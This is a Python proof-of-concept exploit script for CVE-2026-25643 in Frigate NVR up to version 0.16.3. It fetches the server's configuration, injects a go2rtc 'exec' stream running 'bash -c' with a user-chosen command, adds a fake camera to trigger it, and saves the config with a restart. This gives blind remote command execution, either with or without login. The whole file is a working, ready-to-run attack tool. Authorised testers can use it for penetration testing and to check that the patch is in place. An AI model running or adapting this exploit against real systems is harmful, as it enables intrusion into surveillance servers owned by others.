#!/usr/bin/env python3 """ Frigate NVR ≤ 0.16.3 Blind RCE Exploit CVE-2026-25643 This Python exploit targets a critical configuration manipulation vulnerability in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during service restart — no reverse shell or output capture required. Author: Joshua van der poll (https://github.com/joshuavanderpoll) Created: February 2026 Version: 1.0 License: GNU General Public License v3.0 (GPL-3.0) Disclaimer: Use responsibly. This is a proof-of-concept for a patched vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against systems you do not own or have explicit permission to test. Credits / References: - jduardo2704/CVE-2026-25643-Frigate-RCE Usage: python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned" python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt" """ import requests import argparse import sys import json import urllib3 import yaml import time # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Colors GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BLUE = '\033[94m' CYAN = '\033[96m' RESET = '\033[0m' def print_status(msg, color=BLUE, symbol="[*]"): print(f"{color}{symbol} {msg}{RESET}") def print_success(msg): print_status(msg, GREEN, "[+]") def print_warning(msg): print_status(msg, YELLOW, "[!]") def print_error(msg, exc=None): print_status(msg, RED, "[-]") if exc: print(f" → {type(exc).__name__}: {exc}") import traceback traceback.print_exc(limit=2) def login_frigate(session, base_url, username, password): print_status(f"Trying to authenticate as '{username}' ...") try: resp = session.post( f"{base_url}/api/login", json={"user": username, "password": password}, verify=False, timeout=12 ) print_status(f"Login → status code: {resp.status_code}", CYAN) if resp.status_code == 200: print_success("Login successful") return True else: print_warning(f"Login failed - status: {resp.status_code}") if resp.text.strip(): print(f" Response: {resp.text[:180].strip()}") return False except Exception as e: print_error("Login request failed", e) return False def fetch_config(session, base_url): print_status("Fetching current configuration (/api/config/raw) ...") try: resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False) print_status(f"Config fetch → HTTP {resp.status_code}", CYAN) if resp.status_code != 200: print_error(f"Cannot read config - status {resp.status_code}") if resp.text.strip(): print(f" Body preview: {resp.text[:200]}") return None content = resp.text.strip() print_status(f"Received {len(content)} bytes", CYAN) # Handle possible JSON string wrapping or direct YAML if content.startswith('"') and content.endswith('"'): try: content = json.loads(content) print_status("Config was JSON-wrapped → unwrapped", CYAN) except: pass try: config = yaml.safe_load(content) if not isinstance(config, dict): print_error("Parsed config is not a dictionary") return None print_success(f"Config parsed successfully ({len(config)} top-level keys)") return config except yaml.YAMLError as e: print_error("YAML parsing failed", e) print(f" Raw content preview: {content[:300]}") return None except Exception as e: print_error("Failed to fetch/parse configuration", e) return None def send_config(session, base_url, config_data, save_option="restart"): yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False) bytes_size = len(yaml_payload.encode()) print_status(f"Sending modified config ({bytes_size:,} bytes) with option: {save_option}") try: resp = session.post( f"{base_url}/api/config/save?save_option={save_option}", data=yaml_payload, headers={"Content-Type": "text/plain"}, timeout=10, verify=False ) print_status(f"Config save → HTTP {resp.status_code}", CYAN) if resp.status_code in (200, 204): print_success("Configuration accepted (server should restart)") else: print_warning(f"Config rejected - status {resp.status_code}") if resp.text.strip(): print(f" Server response: {resp.text[:300].strip()}") except requests.Timeout: print_warning("Request timed out - server might be restarting already") except Exception as e: print_error("Failed to send modified configuration", e) def inject_command_into_config(config, command): print_status(f"Preparing payload → executing: {command}") payload = f"bash -c '{command}'" print_status(f"Using payload: {payload}", CYAN) # go2rtc → streams if 'go2rtc' not in config: config['go2rtc'] = {} if 'streams' not in config['go2rtc']: config['go2rtc']['streams'] = {} config['go2rtc']['streams']['debug_cmd'] = [f"exec:{payload}"] print_success("Injected malicious stream → debug_cmd") # Fake camera to trigger execution if 'cameras' not in config: config['cameras'] = {} config['cameras']['trigger_exec'] = { 'ffmpeg': { 'inputs': [{ 'path': 'rtsp://127.0.0.1:8554/debug_cmd', 'roles': ['detect'] }] }, 'detect': {'enabled': False}, 'audio': {'enabled': False}, 'enabled': True } print_success("Injected trigger camera → trigger_exec") return config def exploit_command(base_url, username, password, command): session = requests.Session() session.verify = False # Authentication if username and password: login_frigate(session, base_url, username, password) else: print_warning("No credentials provided → attempting unauthenticated access") # Get current config config = fetch_config(session, base_url) if not config: print_error("Exploit aborted - cannot continue without valid config") sys.exit(1) # Modify config with our command try: modified_config = inject_command_into_config(config, command) except Exception as e: print_error("Failed to prepare malicious config", e) sys.exit(1) # Small delay time.sleep(1.2) # Send modified config send_config(session, base_url, modified_config) print("\n" + "="*60) print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}") print(" Keep in mind:") print(" • Output is NOT captured (blind execution)") print(" • Command runs as the user/frigate process") print(" • Multiple executions may occur during restart") print("="*60 + "\n") def main(): parser = argparse.ArgumentParser( description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)" ) parser.add_argument('-u', '--url', required=True, help="Target URL (http(s)://host:port)") parser.add_argument('-U', '--username', required=False, help="Username (optional)") parser.add_argument('-P', '--password', required=False, help="Password (optional)") parser.add_argument('-c', '--cmd', required=True, help="Command to execute on target") args = parser.parse_args() base_url = args.url.rstrip('/') print(f"\n {BLUE}Target :{RESET} {base_url}") if args.username: print(f" {BLUE}User :{RESET} {args.username}") print(f" {BLUE}Command:{RESET} {args.cmd}\n") try: exploit_command( base_url=base_url, username=args.username, password=args.password, command=args.cmd ) except KeyboardInterrupt: print_warning("Interrupted by user") sys.exit(2) except Exception as e: print_error("Unexpected fatal error", e) sys.exit(3) if __name__ == "__main__": main()